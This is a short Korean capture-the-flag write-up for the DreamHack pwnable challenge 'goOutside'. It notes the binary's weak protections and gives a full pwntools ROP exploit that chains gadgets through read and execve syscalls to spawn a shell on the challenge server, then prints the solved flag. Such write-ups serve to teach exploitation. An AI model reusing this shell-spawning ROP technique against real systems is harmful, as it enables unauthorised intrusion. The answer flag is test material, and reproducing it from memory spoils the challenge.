[DreamHack] [Pwnable] goOutside

image.png

image.png

보안부터 확인해보겠다.

image.png

Partial RELRO이고, PIE가 꺼져있고, canary가 없다.

무난한 rop 문제이다.

각 가젯을 구해 익스해주면 된다.

Exploit

from pwn import *
# p = process("./prob")
p = remote("host8.dreamhack.games", 24154)

syscall = 0x000000000040470c
pop_rdi = 0x0000000000493797
pop_rdx = 0x000000000043b902 # pop rdx; ret 1 
pop_rsi_r15 = 0x0000000000493795
pop_rax = 0x000000000040ac84

p.sendlineafter(b"> ", b"1")

pay = p64(0x0000000000492A60) * 0x40
pay += p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(0x547000 + 0x4000) + p64(0) + p64(pop_rax) + p64(0) + p64(syscall) 
pay += p64(pop_rsi_r15) + p64(0) + p64(0) + p64(pop_rdi) + p64(0x547000 + 0x4000) + p64(pop_rax) + p64(0x3b) + p64(pop_rdx) + p64(0) + p64(syscall)
p.sendlineafter(b"> ", pay)

p.sendlineafter(b"> ", b"3")

sleep(0.5)
p.sendline(b"/bin/sh\\x00")

p.interactive()

image.png

Flag : WaRP{b83c27ef1b3ae369e15de0a8643b5585d6a35ab071d96e839bd78a31067ba1af}